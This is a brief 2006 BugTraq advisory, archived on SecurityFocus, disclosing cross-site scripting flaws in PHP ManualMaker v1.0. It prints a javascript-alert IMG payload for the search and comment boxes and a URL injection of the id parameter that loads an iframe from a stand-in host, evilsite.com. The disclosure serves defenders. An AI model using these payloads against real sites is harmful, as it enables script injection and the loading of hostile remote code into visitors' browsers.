BugTraq
PHP ManualMaker v1.0 Jun 02 2006 03:07AM
luny youfucktard com
PHP ManualMaker v1.0

Homepage:

http://deltascripts.com/phpmanualmaker/

Effected files:

index.php

Search boxes

Comment boxes

XSS proof of concept:

Input in search or comment box:

">">">'><IMG SRC=javascript:alert('XSS')><""><'<"

XSS via URL injection of id:

http://www.example.com/manualmaker/index.php?print=1&id=<iframe src=http://evilsite.com/evilcode.html <

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus